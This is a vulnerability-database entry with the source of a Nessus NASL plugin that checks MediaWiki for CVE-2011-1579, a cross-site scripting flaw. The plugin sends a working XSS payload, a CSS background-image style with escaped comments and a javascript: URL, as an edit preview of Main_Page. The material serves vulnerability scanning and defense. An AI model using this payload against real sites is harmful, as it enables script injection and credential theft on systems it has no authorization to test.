MediaWiki Backslash Escaped CSS Comments XSS

2011-04-1500:00:00

www.tenable.com

CVSS2

5.8

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

AI Score

6.3

Confidence

High

EPSS

0.004

Percentile

74.1%

JSON

This installation of MediaWiki is affected by a cross-site scripting vulnerability that allows an attacker to execute arbitrary script code in the browser of an unsuspecting user. Such script code can steal authentication credentials and be used to launch other attacks.

This version of MediaWiki may also contain a second cross-site scripting and/or an unauthorized access vulnerability, but this plugin did not test for these vulnerabilities.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(53448);
  script_version("1.15");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/06");

  script_cve_id("CVE-2011-1579");
  script_bugtraq_id(47354);
  script_xref(name:"SECUNIA", value:"44142");

  script_name(english:"MediaWiki Backslash Escaped CSS Comments XSS");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a version of MediaWiki that is affected by
a cross-site vulnerability.");
  script_set_attribute(attribute:"description", value:
"This installation of MediaWiki is affected by a cross-site scripting
vulnerability that allows an attacker to execute arbitrary script code
in the browser of an unsuspecting user. Such script code can steal
authentication credentials and be used to launch other attacks.

This version of MediaWiki may also contain a second cross-site
scripting and/or an unauthorized access vulnerability, but this
plugin did not test for these vulnerabilities.");
  # http://lists.wikimedia.org/pipermail/mediawiki-announce/2011-April/000096.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?ccfd3229");
  script_set_attribute(attribute:"see_also", value:"https://phabricator.wikimedia.org/T30450");
  script_set_attribute(attribute:"solution", value:
"Upgrade to MediaWiki 1.16.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);

  script_set_attribute(attribute:"vuln_publication_date", value:"2011/04/12");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/04/12");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/04/15");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:mediawiki:mediawiki");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses : XSS");

  script_copyright(english:"This script is Copyright (C) 2011-2024 Tenable Network Security, Inc.");

  script_dependencies("mediawiki_detect.nasl");
  script_require_keys("installed_sw/MediaWiki", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("misc_func.inc");
include("install_func.inc");

app = "MediaWiki";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];

function try_exploit(title)
{
  local_var bound, boundary, eol, headers, pat, post, res, xss, output;

  eol = '\r\n';
  bound = 'NESSUS';
  boundary = '--' + bound;
  xss = '<div style="background-image:ur\\2f\\2a//\\2a\\2fl(javascript:alert(&#39;XSS&#39;))">NESSUS TEST</div>';

  # Format the post data into the format the server needs.
  post = boundary + eol;
  post += 'Content-Disposition: form-data; name="wpTextbox1"' + eol;
  post += eol;
  post += xss + eol;
  post += boundary + "--" + eol;

  headers = make_array(
    "Content-Type", "multipart/form-data; boundary=" + bound
  );

  # Try to preview an edit to the main page w/ some XSS in a CSS attribute.
  res = http_send_recv3(
    item         : dir + "/index.php?title=" + title + "&action=submit",
    add_headers  : headers,
    method       : "POST",
    data         : post,
    port         : port,
    exit_on_fail : TRUE
  );

  # If our XSS isn't somewhere on the page, we've failed. Note that
  # this won't match the contents of the textarea because the
  # less-than signs will be HTML entities in there.
  pat = '<div style="background-image:ur/*//*/l(javascript:alert(&#39;XSS&#39;))">NESSUS TEST</div>';
  if (pat >!< res[2]) return FALSE;

  output = extract_pattern_from_resp(string:res[2], pattern:'ST:' + pat);
  if (empty_or_null(output)) output = strstr(res[2], xss);

  security_report_v4(
    port        : port,
    severity    : SECURITY_WARNING,
    generic     : TRUE,
    xss         : TRUE, # Sets XSS KB item
    line_limit  : 6,
    request     : make_list(http_last_sent_request()),
    output      : chomp(output)
  );

  return TRUE;
}

# Try to exploit the CSS comment injection vulnerability. When initially
# installed, MediaWiki allows the Main Page to be anonymously edited.
if (!try_exploit(title:"Main_Page"))
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, build_url(port:port, qs:dir));